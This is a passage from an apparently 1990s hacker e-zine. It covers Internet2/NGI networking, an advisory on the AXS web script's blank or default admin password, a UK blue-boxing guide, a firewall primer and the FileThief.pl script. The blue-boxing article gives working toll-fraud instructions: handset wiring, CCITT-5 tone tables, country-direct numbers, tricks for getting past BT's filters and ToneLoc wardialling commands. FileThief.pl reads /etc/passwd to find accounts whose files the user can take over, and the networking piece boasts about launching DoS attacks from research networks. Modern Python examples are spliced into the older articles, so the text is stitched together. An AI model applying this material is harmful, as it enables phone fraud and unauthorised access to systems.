DiffServ causes less strain on a network than RSVP does. For this reason, it is the preferred method. However, DiffServ doesn't guarantee the connection as well and as tightly as RSVP does. So there are trade offs. DiffServ works by labeling packets with "per-hop behaviors" (PHBs). PHBs basically define the level of service that this packet will need. The PHB is initially defined on the edge routers (closest to the sending device). End devices on the network have the job of reshaping traffic as it leaves the domain, taking into account any burst traffic that may occur. DiffServ assures a basic throughput but allows for bursts when resource availability permits (depending on the PHB type assigned to the packet). All the information needed for DiffServ is held in the DS-field in the IP headers.

In all likelihood we will not be implementing DiffServ on our home or small networks, or even large ones for that matter. It will be the responsibility of your BB (Bandwidth Broker, also known as your ISP) to provide DiffServ where needed. It will be the BB's job to aggregate all of their DiffServ traffic into one stream before it is sent out of the network and onto another. Last thing: DiffServ, unlike RSVP, has no built in support for Multicasting.

For the purpose of testing QoS methods the QBONE initiative was created in 1998. The QBONE is a joint effort of academic, governmental and corporate researchers and engineers, created as a wide area testbed for QoS protocols. It crosses both NGI and i2 borders, operating through almost all of the advanced networks in the US and abroad (such as vBNS, Abilene, ESNet, CA*NET, which are discussed later). For more details on the QBONE and QoS try http://www.internet2.edu/qbone/.

> IP Multicasting

Let's say that both you and I live in the same city and use the same Internet provider.
Let's also say that we are both listening to a live stream (if they one day do live) of Geeks in Space (www.the-sync.com/geeks) at the exact same time. This means that the same datagrams are coming to the same network, the same POP, at the same time, like so:

   _____                      ____
  |Geeks|----Stream1---------|our |-------- Me
  | in  |                    |Lame|
  |Space|----Stream2---------|ISP |-------- You
   -----                      ----

It would certainly be to the entire Internet's advantage and ours if we could combine those two streams into one, creating less congestion on the network. IP Multicasting refers to doing exactly that. Example:

   _____                      ____
  |Geeks|                    |our |-------- Me
  | in  |----Stream----------|Lame|
  |Space|                    |ISP |-------- You
   -----                      ----

In the above example there is only one stream of datagrams going out over the Internet, but once it gets to our ISP it splits the stream into two and sends Geeks In Space to you and me at the same time. In order to do this it creates "Multicasting Groups" for each stream (both you and I being in the same group). It also requires smart routers which can replicate streams and keep track of and create these groups, dynamically adding users when needed. Also, the routers all along the way from the Real Audio server to our ISP must support IP multicast protocols such as DVMRP (Distance Vector Multicast Routing Protocol), PIM (Protocol Independent Multicast) or MOSPF (Multicast Open Shortest Path First).

To use IP multicasting today you must connect to an existing network within the public Internet known as the MBONE (at least, that is where all the action is at). Before you can do that, however, your ISP must support Multicasting. Check with them to see if they do, else, switch ISPs. For more information about the MBONE and IP multicasting check out www.mbone.com. For even more info on multicasting try www.ncne.nlanr.net/faq/multicast.html

II. NGI and i2
------------------------------------------------------------------------

Like I said before, the NGI and i2 initiatives are almost identical. They operate on mostly the same networks and backbones. They have pretty much the same goals. However, there are a few things that make them different, other than who is in control of each initiative and the budget that they have. The following takes a look at each initiative.

> NGI

In the NGI there are a few different Government organizations that are involved in making the goals of NGI a reality. Those organizations are DARPA (Defense Advanced Research Projects Agency), NSF (National Science Foundation), NASA (National Aeronautics and Space Administration), NIST (National Institute of Standards and Technology), NLM (National Library of Medicine) and the DoE (Department of Energy). Each of these organizations has different responsibilities, some overlapping in areas. Each of these organizations has its own physical networks that it can test things out on (some of which are discussed later). I'm not going to discuss the specifics of what their jobs are, if you want more information go to: www.ngi.gov

The NGI project budget for 1998 was $80 million US Dollars. 1999 is $110 million. 2000 will be $110 million. The project was only granted 3 years of funding by Congress but planned up till 2002 (I guess the budget comes later). There is a possibility that it could be extended even further, however.

There are a number of very specific goals for NGI: To develop a NGI testbed that supports end-to-end QoS for new networking technologies and advanced research. This testbed will connect at least 100 NGI sites - universities, Federal research institutions, and other research partners - at speeds 100 times faster than today's Internet (OC-3 - 155mbps), and will connect 10 sites at speeds 1,000 times faster than the current Internet (OC-48 - 2.5gbps).
Another goal of the NGI is to demonstrate Terabit switching technology by 2002. At the NGI/i2 conference I went to there was a professor from Hebrew University Israel who gave a lecture on an Optical Terabit switch that he had developed and tested. The switch could do well over 1tbps with hop rates of 10ms. That certainly grabbed the attention of the NSF guys at the conference. The device is supposed to go into production sometime in two years, as I remember.

The NGI network is spread out over several different networks. The ones that I know of are: vBNS (run by NSF), Abilene (run by UCAID), ESNet (run by DoE) and NREN (run by NASA). In order for a corporation or University to hook up to NGI they must connect to one of these backbones. In many cases the requesting peer will just connect to a GigaPOP which is already connected to one of the backbone NAPs. Then they must arrange (with the NSF I believe) to be added to the NGI registrar and routing tables. In many cases, the organization or university can get government funding from the NSF.

> i2

Internet2 is an advanced network initiative by UCAID (University Corporation for Advanced Internet Development) and several other corporations. The budget is about $80 million a year. i2, like NGI, is spread out over various high speed backbones in the US. The two major ones are vBNS and Abilene, which will be discussed later. In most cases Universities will connect to GigaPOPs which in turn connect to one of the i2 backbones. i2, like NGI, is involved with implementing and developing QoS, IPv6 and advanced network applications. There is no real literature on the net that discusses the goals of i2. The talk is more around the backbones that it operates on.

III. Advanced high speed backbones
------------------------------------------------------------------------

As I said before, both i2 and NGI run over several high speed backbone networks. The following discusses a few of them in detail.
> vBNS

The NSF initiated the very high speed Backbone Network Service (vBNS) in 1995. With help from MCI the NSF set up a high speed backbone across the US. The purpose was to connect Government, Industry and Universities to 5 SCCs (Super Computing Centers) in the US and then, inevitably, to each other. For those interested, those 5 SCCs are:

- Cornell Theory Center
- National Center for Atmospheric Research
- Pittsburgh Supercomputer Center
- National Center for Supercomputer Applications
- San Diego Supercomputer Center

The vBNS serves as a backbone for both the NGI and i2 initiatives. The vBNS uses IP over ATM over SONET. It operates at speeds up to OC-48 (2.5gbps). MCI also created a second "testnet" network for testing experimental technologies until they prove stable for implementation on the vBNS. Most Peers connect at DS3 and OC-3 speeds to one of the vBNS NAPs (Network Access Points) or to a GigaPOP that is already plugged up to a NAP. The vBNS supports both Native and Tunneled IPv6.

> Abilene

The Abilene network was created by UCAID in collaboration with Qwest Communications, Cisco, Nortel Networks and a few others that I don't remember. It was created for the sole purpose of connecting i2 peers. It operates at speeds up to OC-48 using IP over SONET. As I remember, the lines were laid and POPs put in place by Qwest Communications. If you want to connect to the Abilene backbone all you need is $110k a year for an OC-3 connection, $320k a year for an OC-12. Small price to pay :]

> ESNet

ESNet (Energy Science Network), headed by the DoE (Department of Energy), provides for speeds up to OC-12. It connects directly to the vBNS, STARTAP and many other high speed US backbones. Peers connect at anywhere from 64k up to OC-12 speeds. It has been around for a while and has a lot of networks connected to it.
For more information check out: www.es.net

> International networks

It was in 1997 that the NSF started taking proposals from other R&D networks in other countries to add International peers to its registrar for the vBNS. I guess the US GOV and academic establishments realized that the US wasn't exactly the smartest country on the planet. The International peers connect through the STARTAP and connect from there to other i2 or NGI peers. STARTAP (Science, Technology, And Research Transit Access Point) is the International NAP for most US networks (other than the Internet). The STARTAP connects directly to the Ameritech NAP in Chicago, which connects to the vBNS and many other high speed US networks. The STARTAP is funded by the NSF and maintained by the University of Illinois at Chicago and a few other Chicago based groups. The STARTAP currently supports speeds up to OC-12 and supports DiffServ, RSVP, Multicasting and IPv6. For more information on the STARTAP check out: www.startap.net

The following are just a few examples of International networks that are hooking up to i2 or NGI through the STARTAP.

>> Israel's tap

The Israeli government has committed $10 million a year for the next four years towards advanced network development in Israel. The group in charge of all i2 and NGI activities is the IUCC (Israel Inter-University Computation Center), whose main members are the eight major universities in Israel. This is where it will start, with the Universities, and then shortly after it should be open to commercial R&D departments. There is one Satellite link at 44mbps from Israel (Tel Aviv University) to the STARTAP in Chicago, US. Israel bought the entire spectrum on the sat so there are plans for upgrading that speed anywhere from 60mbps to 140mbps, as needed. There is also a fiber optic E3 (34mbps) line from Israel (Bar Ilan U. I believe) to the UK where it connects to the QUANTUM network in Europe (http://www.dante.net/quantum).
After that there is another fiber optic line going from the connection point in the UK over to the US at 10mbps for redundancy. I've heard rumors of a 2gbps line being set up from the US to Israel but I have not been able to confirm this. Though the i2 website for the IUCC claims full support for QoS, I don't believe it. At an i2/NGI conference I went to I asked one of the IUCC speakers about this and he gave no real assurances for QoS support, quite the opposite. For more information on the i2 project in Israel go to www.internet-2.org.il

>> CA*NET3

CA*NET3 currently runs at OC-48 (2.5gbps). The Canadian government, in partnership with some High Tech companies, funds the project. NAPs to the backbone are located all along the southern border of Canada and connect to other US networks through the STARTAP. The Canadian Government has committed $53 million to the project, which will last a year or so (don't remember the exacts). The project was initiated in 1998. CA*NET3 uses DWDM (Dense Wavelength Division Multiplexing) to get to OC-48. CANARIE (Canadian Network for the Advancement of Research, Industry and Education) is the group in charge of the project; for more info check out their site at: www.canarie.ca or www.canet3.net. The CANARIE consortium includes commercial, academic and governmental departments of Canada.

IV. Security concerns
------------------------------------------------------------------------

There are a couple of security concerns as I see it. The first is about the way most universities and organizations make requests to plug up to i2 or NGI. They create a proposal and many will list, in great detail, the details of their network. One sad sight I saw was the San Diego Supercomputer Center, which posted a map of all the IP NetIDs for its network. Even worse was CANARIE, which posted the same thing (the NetIDs) for the entire CA*NET3 backbone. Now, these are private networks.
However, all I would need, in theory, is a terminal at an i2 or NGI peer to start playing around. It seems even easier when I start to really look at their proposals. Most peers make the default path their NGI or i2 connection when the destination is another i2 or NGI peer, even for something as simple as a webpage. So, depending on how it is implemented I may be able to just start from a simple Student terminal, as opposed to having to hack into the Systems group terminals or servers first.

The second is concerning DoS attacks. Give me bandwidth and I'm in DoS heaven :) On an i2 or NGI peer's network I may have a lot of bandwidth at my disposal (depending on what type of policy they come under when connecting to i2 or NGI backbones). Then, if I find a peer stupid enough with a proxy from there to the normal Internet, who knows. And I'm only a nominal security buff, I imagine that there are a lot more concerns that I haven't seen. There is, however, an IETF Security Workgroup in place for this exact reason. So, who knows?

If you have any questions, comments, corrections... e-mail me at: mindmore@mindless.com I will try to post any technical corrections in the next issue of this e-zine.
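As an added example for the Services section above (my own code, not part of Cyphunk's article): a small Python parser that pulls the DS field out of an IPv4 header (variable length, header checksum) and out of an IPv6 header (fixed 40 bytes, no header checksum), maps the DSCP to its PHB name, and shows the edge-router remarking step the DiffServ section describes. The two packets it runs on are constructed inline for the demonstration.

```python
import struct

# DSCP code points: class selectors (RFC 2474), AF (RFC 2597), EF (RFC 3246).
PHB_NAMES = {0: "BE (default)", 46: "EF"}
for _cls in range(1, 5):
    for _drop in range(1, 4):
        PHB_NAMES[_cls * 8 + _drop * 2] = "AF%d%d" % (_cls, _drop)
for _cls in range(1, 8):
    PHB_NAMES[_cls * 8] = "CS%d" % _cls


def phb_name(dscp):
    """Name of the per-hop behaviour selected by a 6-bit DSCP value."""
    return PHB_NAMES.get(dscp, "unassigned (%d)" % dscp)


def parse_ip_header(pkt):
    """Return (version, header_len, dscp, ecn, next_proto) for a raw IP packet.

    IPv4: the header length comes from the IHL nibble and may be 20..60 bytes;
    the DS field is the old TOS byte.  IPv6: the header is always 40 bytes and
    the DS field is the 8-bit Traffic Class right after the 4-bit version.
    """
    if not pkt:
        raise ValueError("empty packet")
    version = pkt[0] >> 4
    if version == 4:
        if len(pkt) < 20:
            raise ValueError("truncated IPv4 header")
        hlen = (pkt[0] & 0x0F) * 4
        if hlen < 20 or len(pkt) < hlen:
            raise ValueError("bad IHL")
        ds = pkt[1]
        return (4, hlen, ds >> 2, ds & 0x3, pkt[9])
    if version == 6:
        if len(pkt) < 40:
            raise ValueError("truncated IPv6 header")
        first_word, = struct.unpack("!I", pkt[:4])
        ds = (first_word >> 20) & 0xFF
        return (6, 40, ds >> 2, ds & 0x3, pkt[6])
    raise ValueError("unknown IP version %d" % version)


def ipv4_checksum(hdr):
    """RFC 1071 one's-complement checksum over an IPv4 header (0 when valid)."""
    if len(hdr) % 2:
        hdr += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(hdr) // 2), hdr))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def mark_dscp(pkt, dscp):
    """Edge-router style remarking: rewrite the 6-bit DSCP, keep the ECN bits.

    For IPv4 the header checksum must be recomputed; IPv6 has none to fix.
    """
    version, hlen, _, ecn, _ = parse_ip_header(pkt)
    ds = (dscp << 2) | ecn
    out = bytearray(pkt)
    if version == 4:
        out[1] = ds
        out[10:12] = b"\x00\x00"
        out[10:12] = struct.pack("!H", ipv4_checksum(bytes(out[:hlen])))
    else:
        word, = struct.unpack("!I", pkt[:4])
        word = (word & ~(0xFF << 20)) | (ds << 20)
        out[:4] = struct.pack("!I", word)
    return bytes(out)


# --- constructed sample packets (headers only, no payload) ---
# IPv4, IHL=6 (24-byte header with four NOP option bytes), DSCP 46 (EF), UDP.
_v4 = struct.pack("!BBHHHBBH4s4s", 0x46, 46 << 2, 24, 0, 0x4000, 64, 17, 0,
                  b"\x0a\x00\x00\x01", b"\x0a\x00\x00\x02") + b"\x01\x01\x01\x01"
IPV4_EF = _v4[:10] + struct.pack("!H", ipv4_checksum(_v4)) + _v4[12:]

# IPv6, Traffic Class carrying DSCP 34 (AF41), flow label 0x12345, TCP.
IPV6_AF41 = struct.pack("!IHBB16s16s",
                        (6 << 28) | ((34 << 2) << 20) | 0x12345, 0, 6, 64,
                        b"\x20\x01\x0d\xb8" + b"\x00" * 11 + b"\x01",
                        b"\x20\x01\x0d\xb8" + b"\x00" * 11 + b"\x02")


def describe(pkt):
    """One-line summary of the DS field and header shape of a packet."""
    version, hlen, dscp, ecn, proto = parse_ip_header(pkt)
    return "IPv%d hdr=%d bytes DSCP=%d (%s) ECN=%d proto=%d" % (
        version, hlen, dscp, phb_name(dscp), ecn, proto)


if __name__ == "__main__":
    for p in (IPV4_EF, IPV6_AF41):
        print(describe(p))
    # A bandwidth broker's edge router bleaching an untrusted mark to best effort:
    print(describe(mark_dscp(IPV4_EF, 0)))
```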
- Cyphunk

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

    ------------------------------------------------+
    |       -------------------------------------
    |       AXS Script Makes WebServer Vulnerable
    |       -------------------------------------
    |
    |       --- by f0bic - [ linux security ]
    |       --- f0bic@deadprotocol.org
    |       (this article was also published on BugTraq)
    |                                        ________
    [_______________________________________|

-----------------
Brief Description
-----------------

The AXS webserver script by Fluid Dynamics (www.xav.com) allows unauthorized third party users to make use of the ax-admin Administration/Configuration module and remotely edit and/or delete log files and overwrite files on the system. Compromise of system resources might also be one of the effects of this vulnerability.

--------------------
Vulnerable Platforms
--------------------

Any operating system AXS is compatible with.

- *NIX Operating Systems (AXS cgi set)
- WindowsNT Operating System (AXS perl set)

I have seen the AXS (cgi set) operate on Apache 1.2.6/1.3.3, NCSA, Netscape-Commerce, and the (perl set) operate on IIS 3.0/4.0, Netscape-Fasttrack.

-------------------------
Vulnerability Description
-------------------------

The AXS Script is a cgi or perl script that keeps track of the number, the source locations and the client info of visitors to your http port (80). It writes this data to an output file, named log.txt by default (but it can easily be relocated). This log.txt is normally located in the cgi-bin directory of the server, meaning the script needs write access to this directory. The AXS cgi script contains two .cgi files; ax.cgi and ax-admin.cgi respectively. The ax.cgi file is the one that actually "grabs" the info about the visitors and then writes them to log.txt (or wherever you relocated this to).
The ax-admin.cgi is the configuration file for the ax.cgi script. The ax-admin.cgi is protected by the default password "IronMan" and sometimes it is even left blank. Due to this weak access security it is very easy to gain "configuration access" to the ax.cgi script, allowing you to reconfigure it, delete the log files, and change the location of the logs.

The default location for the AXS script is http://www.server.com/cgi-bin/ax.cgi. The default location for the AXS Admin script is http://www.server.com/cgi-bin/ax-admin.cgi.

To obtain access to the ax-admin.cgi module, by default you get a password screen issued, IronMan being the default password. The password is determined by the characters in the $password="*" field of the ax-admin.cgi hardcode ("*" being the default/chosen password or a blank). Most of the time I have seen the password field left blank or defaulted. If the password is left blank you will not be prompted for a login screen; instead it will automatically drop you into the ax-admin configuration page. From this point on you can alter files on the server system, possibly resulting in Denial-of-Service attacks against the system's resources.

---------
Solutions
---------

The AXS problems relate to a lack of resources that could suffice for secure business applications. The AXS script, on the other hand, has been developed for ease of use, not for the trouble of security; this is one of the mistakes that Fluid Dynamics has made. The easy way is not to run with no password or the default password on the ax-admin.cgi module. I have informed Fluid Dynamics about the fact that I have seen servers where the ax-admin password was the same as the one for a valid shell account on that system. Fluid Dynamics has also gone through no trouble at all to encrypt any of the passwords used in the ax-admin verification.
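As an added example (my own code, not f0bic's and not AXS's source): a Python audit that reads the $password="*" line out of a copy of ax-admin.cgi and flags the blank and default cases described above, next to a model of the weak check and a hardened replacement that stores a salted hash, compares in constant time and refuses to come up with a blank or default password. The Perl fragments it inspects are constructed for the demonstration.

```python
import hashlib
import hmac
import os
import re

DEFAULT_PASSWORD = "IronMan"   # the shipped default named in the advisory

# Matches the hard-coded assignment the advisory points at:  $password="...";
_PASSWORD_LINE = re.compile(r'^\s*\$password\s*=\s*"([^"]*)"\s*;', re.MULTILINE)


def audit_ax_admin_source(perl_source):
    """Classify the admin password hard-coded in an ax-admin.cgi file."""
    m = _PASSWORD_LINE.search(perl_source)
    if m is None:
        return "UNKNOWN: no $password assignment found"
    pw = m.group(1)
    if pw == "":
        return "BLANK: configuration page reachable with no prompt at all"
    if pw == DEFAULT_PASSWORD:
        return "DEFAULT: shipped password still in place"
    return "SET: custom password (still stored in clear text in the script)"


def weak_admin_access(configured_password, submitted_password):
    """Model of the behaviour described in the advisory (not the real AXS code):
    a blank configured password skips the prompt entirely, otherwise access is
    a plain-text string compare against the value in the script."""
    if configured_password == "":
        return True
    return submitted_password == configured_password


class AdminAuth:
    """Hardened replacement: salted PBKDF2 hash, constant-time compare, and
    no way to enable the module with a blank or default password."""
    ITERATIONS = 200_000
    MIN_LENGTH = 12

    def __init__(self, salt, digest):
        self.salt = salt
        self.digest = digest

    @classmethod
    def from_new_password(cls, password, salt=None):
        if password == "" or password == DEFAULT_PASSWORD:
            raise ValueError("refusing blank or default admin password")
        if len(password) < cls.MIN_LENGTH:
            raise ValueError("admin password shorter than %d chars" % cls.MIN_LENGTH)
        salt = salt if salt is not None else os.urandom(16)
        digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                     salt, cls.ITERATIONS)
        return cls(salt, digest)

    def check(self, submitted):
        candidate = hashlib.pbkdf2_hmac("sha256", submitted.encode("utf-8"),
                                        self.salt, self.ITERATIONS)
        return hmac.compare_digest(candidate, self.digest)


# Constructed stand-ins for the top of three ax-admin.cgi deployments.
SAMPLE_BLANK = '#!/usr/bin/perl\n$password="";\n$logfile="log.txt";\n'
SAMPLE_DEFAULT = '#!/usr/bin/perl\n$password="IronMan";\n$logfile="log.txt";\n'
SAMPLE_CUSTOM = '#!/usr/bin/perl\n$password="correct-horse-staple-99";\n'


if __name__ == "__main__":
    for name, src in (("blank", SAMPLE_BLANK), ("default", SAMPLE_DEFAULT),
                      ("custom", SAMPLE_CUSTOM)):
        print("%-8s %s" % (name, audit_ax_admin_source(src)))
    auth = AdminAuth.from_new_password("correct-horse-staple-99")
    print("hardened check, right password:", auth.check("correct-horse-staple-99"))
    print("hardened check, default guess: ", auth.check(DEFAULT_PASSWORD))
```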
EOF

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

  +--------------------------+
  | PURSUiT presentation,    |
  |                          |
  | Boxing in the UK         |
  |                          |
  | By Oktal                 |
  |                          |
  +--------------------------+

Part 1. Blue Boxing

Part 2 will be on Beige Boxing and will be in issue 3 of PURSUiT

Blue boxing is sending noises down a fone line to seize the trunk and make free fone calls (among other things). The trunk is where operators dial from. But they don't use the same frequencies as home fones, so we need to get the tones from your soundcard to the fone line.

What you will need for this hobby:

  1 Computer + Sound card
  1 Tone-generating software (eg. http://x-iz.net/gbh/bluebeep.zip)
  1 Cheap telephone (I use the old 'Viscount' series by BT because I have a friend who has loads he doesn't want)
  4 Wires (at least 1 metre each)
  2 2.5mm jack plugs (from your local electrical shop)
  1 Hole-making equipment (hammer+nail)
  1 Soldering iron + solder (optional)

What you must do for this hobby:

Open up the handset so you can see all the insides. There should be a speaker and a microphone, each with 2 wires connecting into them. Attach (or solder) one of your 4 wires to each of the wires in the handset. Now make a hole in the casing for the wires to emerge from. Open up the jack plugs and attach the 2 wires from the speaker to the connections in one plug and the 2 wires from the mic to the connections in the other plug. Use solder if you want. Stick the handset back together. Disconnect the speakers and microphone from your computer and plug the earpiece into the microphone socket and the mouthpiece into the speaker socket.

-OR-

If you have electrical knowledge, you could make a box that generates the tones by itself and doesn't need connection to a soundcard.
A long time ago, BT had a tone (2280hz) which was used by BT engineers to access certain functions within the trunk. Phreakers discovered that this could be abused to seize the trunk and make free calls out of it. But BT got wise to the phreakers so now blue boxing is impossible in the UK. But BT does have 'country direct' lines which are freefone 0800 numbers to overseas. They are mostly in the 0800 890 XXX range along with some other useful numbers. These countries' exchanges are not as modern as here and they are blue boxable. (NB: not all country direct lines are boxable)

Some country direct numbers to countries with CCITT-5 lines:

  South Africa   0800 890 027
  Germany        0800 890 049
  Brazil         0800 890 055
  Chile          0800 890 056
  Libya          0800 890 059
  Australia      0800 890 061
  Indonesia      0800 890 062
  France         0800 890 133
  Bahamas        0800 890 135
  Gabon          0800 890 241
  etc etc etc

You can then make an international call out of that country to the UK (or any other country) and make a free call.

Using Bluebeep by Onkel Dittmeyer:

The 'action mode' sucks so you should program a script to play the tones. A sample (and very good) script that I made is included in the zip file (http://x-iz.net/gbh/bluebeep.zip). To make your own script to your own needs, read 'Script Language' from the Info|Documentation menu. To run a script, type BLUEBEEP /EXEC FILENAME.EXT from the prompt. For a list of all the command-line switches, type BLUEBEEP /?

Tone specifications for the CCITT-5 exchange:

  Description        Frequency (Hz)   Duration (ms)   Pause after tone (ms)
  digit 1            700 & 900        60              40
  digit 2            700 & 1100       60              40
  digit 3            900 & 1100       60              40
  digit 4            700 & 1300       60              40
  digit 5            900 & 1300       60              40
  digit 6            1100 & 1300      60              40
  digit 7            700 & 1500       60              40
  digit 8            900 & 1500       60              40
  digit 9            1100 & 1500      60              40
  digit 0            1300 & 1500      60              40
  KP1                1100 & 1700      80              40
  KP2                1300 & 1700      80              40
  ST                 1500 & 1700      80              80
  Clear Ahead Tone   2400 & 2600      150             30
  Seize Tone         2600 & 2600      80              20

Be aware that duration times may differ slightly with the exchange.
To seize the trunk of a CCITT-5 line:

1. You will hear a bleep after you dial the country direct number
2. Send the clear ahead tone after that bleep (makes it think you've hung up)
3. Then send the seize tone (so it thinks it's talking to the telco equipment)
4. You will hear a bleep and a chunk
5. Dial the number as shown: KP2+Zero+CountryCode+AreaCode+Number+ST
   eg. KP2,0441818118181,ST

But BT often put filters on the country direct lines to filter out these tones. Here are some tricks to get past a lot of filters:

The average tone of a conversation is around 3000 Hz. This is called 'pink noise'. Bluebeep allows 3 simultaneous tones, so add 3000 Hz to the last frequency of each tone in the dial set list.

Some filters raise or lower the pitch of the sound slightly. Try tones just above or just below the given frequencies. (eg. 2395 or 2405 instead of 2400)

You may have to do some frequency analysis on the echo you get from the system. A good tool for this is Wintone (30-day trial version at www.steaksandwich.com, registration $20 (£13), or you could read my article on cracking software, which will be coming soon in PURSUiT)

That's it guys. Any information you may have on UK boxing can be sent to ms@punkass.com for a great big essay I have planned for the mag next year on UK boxing. Remember part 2 of this article (beige boxing) is in issue 2.

Wardialling & Scanning

If a country direct number is abused too much then BT is forced to shut it down :( So every so often the one you use will go away and you'll have to use another. Well, the list above is by no means complete. And there are other very useful numbers in the 0800 890 XXX range, so... Why not find out what they all are? "What, scan 1000 numbers???" No... you get a wardialler to do that for you. It dials them all up (don't do this all at once, BT'll notice) and when you come back it'll tell you which ones picked up and which ones didn't exist.
(it might also tell you if it was a data or voice line) Then you can dial the ones that look interesting. You just tell it what range to scan and leave it for a while. You could also be at your desk while the dialler is running so you can listen to them and take note of what the voice ones are, like "voice: "Mark at reception how may I help you?"

A good wardialler is ToneLoc at http://x-iz.net/gbh/toneloc.zip

Example ToneLoc Syntax:

  C:\> TONELOC OUTPUT.TXT /M:0800890XXX /R:000-999 /S:3:00a /E:4:00a

will dial 0800890000, 0800890001, 0800890002... 0800890999 starting at 3 am and ending at 4 am (regardless of how far thru the scan it has got)

  C:\> TONELOC OUTPUT.TXT /M:0800890XXX /R:000-999 /H:1:00

will scan the range starting NOW and ending in one hour

Toneloc also has some cool options like Black Book; a txt file of numbers to NEVER dial (eg. 999) during a scan, and loads of other cool stuff. To set up options like that and config stuff like modem strings, run TLCFG.EXE

A really neat trick is the Scan Map. I can't explain it, it is just so great. Run TONEMAP SAMPLE.DAT to see what I mean.

EOF

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

  *-------------------------------*
  | PURSUiT is proud to present.. |
  |                               |
  | Introduction to Firewalls     |
  |                               |
  | By deadline                   |
  *-------------------------------*

What is a firewall?
---------------------

A firewall is a system or group of systems that enforces an access control policy between two networks. The actual means by which this happens varies widely, but in principle, the firewall can be thought of as a pair of mechanisms, one that is there to block traffic, and the other which permits traffic. Some firewalls place a greater emphasis on only blocking traffic, while others are strictly for permitting traffic.
Diagram:

  O = Outside Host        1: packets to the firewall
  F = Firewall/Router     2: firewall accepts or denies
  I = Internal Network    3: packets go to host

                                 (3)
                                 IIII
                           |-----IIII
                (2)        |
      (1)      FFFFF-------|     (3)
  OOOO---------FFFFF-------------IIII
  OOOO         FFFFF-------|     IIII
                           |     (3)
                           |-----IIII
                                 IIII

Protection
--------------

Firewalls offer protection against many kinds of things. They offer protection from malicious packets, e-mail spam/bombs, and also intruders to your system. But there are also attacks firewalls CANNOT protect you against (attacks that don't go through the firewall), like people from inside the network; from there, that user can give access to outside networks, which can be potentially dangerous to your network. And lastly, firewalls can't protect against tunneling over application protocols to trojaned or poorly written clients.

Types of Firewalls
--------------------

1: Network Layer
------------------

Network firewalls usually make their decisions based on address (source) and the ports of a packet. Routers are probably the best known network level firewall, because a router is not able to make a great decision about where the packet is actually going or where it came from. Newer network firewalls have increased greatly in maintaining information about the packets that pass through them, contents of data streams, and other sources of information. An important thing to remember is that network firewalls route traffic directly through them, so to use one you usually need to have a validly assigned IP address block. Network firewalls usually are fast and transparent to users.

2: Application Layer
----------------------

Application level firewalls are usually a host running proxy servers. The proxy server usually permits no traffic directly between networks and gives a more detailed log of traffic than the Network level firewalls.
These firewalls can be used as network address translators, since packets go "in one side and out the other", after passing through an application that effectively masks the origin of the initiating connection.

Proxy Servers
---------------

A proxy server is an application that mediates traffic between a protected network and the Internet, meaning it only allows specific connections to connect to the host, and allows only connections out of the host through specified ports. Proxies are usually used instead of router based traffic controls, because they prevent traffic from passing directly between two networks. A lot of proxies have more logging and support for user authentication. Because proxies must understand the application protocol being used, they can also implement protocol specific security, whereby only certain protocols are allowed to be incoming and outgoing from a host.

Firewall Downsides
--------------------

Firewalls, while restricting access from outside attacks, also restrict users inside the network from connecting to some, maybe even all, networks outside the current one. This means a user in the secure network may not be able to connect to, let's say, www.linux.org unless he has the permissions to. This is the same for ftp, telnet, and other various network utilities.

EOF

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

  ]--------------------------------[
  [ FileThief.pl                   ]
  ]--------------------------------[
  [ Developed By                   ]
  ]--------------------------------[
  [ Mister-X (Admin@x-iz.net)      ]
  [ Alkatraz (funnet@icom-web.com) ]
  ]--------------------------------[

For those of you who can't tell what this script does by looking at the source code: it scans /etc/passwd for users with the same UID as your own.
If it finds them it reports to STDOUT and logs to a file, for later browsing. Yes, it is a common occurrence for slack admins to add users with the same UID, meaning that you have full access to their files.

PERL Script Follows:

#!/usr/bin/perl
# FileThief.pl: find other accounts in /etc/passwd that share this user's UID.

# getlogin() can be undef without a controlling tty; fall back to the real UID.
$myusr = getlogin || getpwuid($<);
(undef, undef, $id, undef, undef, undef, undef, $hdir, undef) = getpwnam($myusr);
$fid = time."-$id";
print "Welcome to filethief - searching for $id in /etc/passwd.\n";
$found = 0;

open(logf, ">>$hdir/filethief-$fid.log") or die "cannot open log: $!";
open(pwd, "</etc/passwd") or die "cannot open /etc/passwd: $!";
while(<pwd>) {
    # passwd fields: name:passwd:uid:gid:...  (only the first three are needed)
    my($usr, undef, $uid) = split(/:/, $_, 4);
    if(($uid eq $id) && ($usr ne $myusr)) {
        $found++;
        print logf "$usr has the same ID as $myusr ($id).\n";
    }
}
close(pwd);

if($found == 0) {
    print logf "\nNo matches were found at ".localtime(time)."\n";
} else {
    print logf "Found [$found] matches at ".localtime(time)."\n";
}
close(logf);

# Echo the log file just written to STDOUT.
open(logf, "<$hdir/filethief-$fid.log") or die "cannot reopen log: $!";
while(<logf>) { print; }
close(logf);
exit(1);

EOF

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

[PURSUiT logo]

[ PURSUiT News Update ]

